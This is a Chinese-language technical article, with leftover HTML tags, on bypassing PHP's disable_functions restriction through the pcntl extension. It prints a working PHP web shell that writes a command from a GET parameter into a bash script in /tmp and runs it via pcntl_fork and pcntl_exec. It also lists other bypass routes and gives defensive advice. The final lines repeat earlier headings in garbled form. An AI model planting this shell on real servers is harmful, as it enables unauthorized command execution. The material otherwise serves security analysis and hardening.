PHP绕过禁用函数限制执行命令技术分析<\/h1>

背景介绍<\/h2>

在PHP安全配置中，管理员通常会通过disable_functions<\/code>指令禁用一些危险的函数来防止命令执行漏洞被利用。常见的被禁用函数包括：<\/p>

passthru, exec, system, chroot, chgrp, chown, shell_exec, 
proc_open, proc_get_status, popen, ini_alter, ini_restore, 
dl, openlog, syslog, readlink, symlink, popepassthru, stream_socket_server
<\/code><\/pre>
技术原理<\/h2>
当大部分常见的命令执行函数被禁用时，可以利用pcntl<\/code>扩展中的函数来绕过限制。pcntl<\/code>扩展提供了进程控制功能，通常不会在disable_functions<\/code>中被禁用。<\/p>
关键函数<\/h3>

pcntl_fork()<\/code> - 创建子进程<\/li>
pcntl_exec()<\/code> - 在当前进程空间执行指定程序<\/li>
<\/ol>
绕过技术实现<\/h2>
方法一：利用临时文件和pcntl_exec<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>("Content-Type: text\/plain"<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 1. 创建临时可执行脚本
<\/span><\/span><\/span><\/span>$cmd =<\/span> "\/tmp\/exec"<\/span>;
<\/span><\/span>@<\/span>unlink<\/span>($cmd); \/\/ 删除已存在的文件
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 2. 构造bash脚本内容，从GET参数获取命令
<\/span><\/span><\/span><\/span>$c =<\/span> "#!\/usr\/bin\/env bash<\/span>\n<\/span>"<\/span> .<\/span> $_GET[x<\/span>] .<\/span> "> \/tmp\/output.txt<\/span>\n<\/span>"<\/span>;
<\/span><\/span>file_put_contents<\/span>($cmd, $c);
<\/span><\/span>
<\/span><\/span>\/\/ 3. 设置可执行权限
<\/span><\/span><\/span><\/span>chmod<\/span>($cmd, 0777<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 4. 读取命令执行结果
<\/span><\/span><\/span><\/span>$cd =<\/span> "\/tmp\/output.txt"<\/span>;
<\/span><\/span>print_r<\/span>(file_get_contents<\/span>($cd));
<\/span><\/span>
<\/span><\/span>\/\/ 5. 使用pcntl函数执行命令
<\/span><\/span><\/span><\/span>switch<\/span>(pcntl_fork<\/span>()) {
<\/span><\/span>    case<\/span> 0<\/span>:<\/span> \/\/ 子进程
<\/span><\/span><\/span><\/span>        $ret =<\/span> pcntl_exec<\/span>($cmd);
<\/span><\/span>        exit<\/span>("case 0"<\/span>);
<\/span><\/span>    default<\/span>:<\/span> \/\/ 父进程
<\/span><\/span><\/span><\/span>        echo<\/span> "case 1"<\/span>;
<\/span><\/span>        break<\/span>;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>执行流程<\/h3>

创建一个临时bash脚本文件\/tmp\/exec<\/code><\/li>
将攻击者提供的命令(通过x<\/code>参数)写入该文件<\/li>
设置文件可执行权限<\/li>
使用pcntl_fork()<\/code>创建子进程<\/li>
在子进程中使用pcntl_exec()<\/code>执行临时脚本<\/li>
命令输出被重定向到\/tmp\/output.txt<\/code><\/li>
读取并显示输出文件内容<\/li>
<\/ol>
防御措施<\/h2>


禁用pcntl扩展<\/strong>：在php.ini中移除或禁用pcntl扩展<\/p>
extension=pcntl.so ; 注释或删除这一行
<\/code><\/pre>
<\/li>

限制文件操作权限<\/strong>：<\/p>

设置open_basedir<\/code>限制PHP可访问的目录<\/li>
确保\/tmp<\/code>目录不可被PHP写入<\/li>
<\/ul>
<\/li>

加强服务器配置<\/strong>：<\/p>

使用SELinux或AppArmor限制进程行为<\/li>
定期审查服务器上的可疑文件<\/li>
<\/ul>
<\/li>

代码审计<\/strong>：<\/p>

检查所有文件操作和进程创建相关的代码<\/li>
禁止用户输入直接用于文件操作或命令执行<\/li>
<\/ul>
<\/li>
<\/ol>
其他可能的绕过方式<\/h2>
即使pcntl也被禁用，还有其他可能的绕过方法：<\/p>

LD_PRELOAD技巧<\/strong>：通过mail()等函数触发外部程序执行<\/li>
ImageMagick漏洞<\/strong>：利用图像处理库执行命令<\/li>
FFI扩展<\/strong>：如果启用，可通过调用系统库执行命令<\/li>
COM组件<\/strong>：在Windows系统上使用COM对象<\/li>
<\/ol>
总结<\/h2>
这种绕过技术利用了管理员通常不会禁用pcntl<\/code>扩展的特点，通过创建临时可执行文件并利用进程控制函数来执行命令。防御此类攻击需要多层次的防护措施，包括禁用不必要的扩展、限制文件系统访问和加强进程隔离。<\/p>

PHP绕过禁用函数限制执行命令技术分析<\/h1>

技术原理<\/h2> 当大部分常见的命令执行函数被禁用时，可以利用pcntl<\/code>扩展中的函数来绕过限制。pcntl<\/code>扩展提供了进程控制功能，通常不会在disable_functions<\/code>中被禁用。<\/p>

绕过技术实现<\/h2>

技术原理<\/h2>
当大部分常见的命令执行函数被禁用时，可以利用`pcntl<\/code>扩展中的函数来绕过限制。pcntl<\/code>扩展提供了进程控制功能，通常不会在disable_functions<\/code>中被禁用。<\/p>`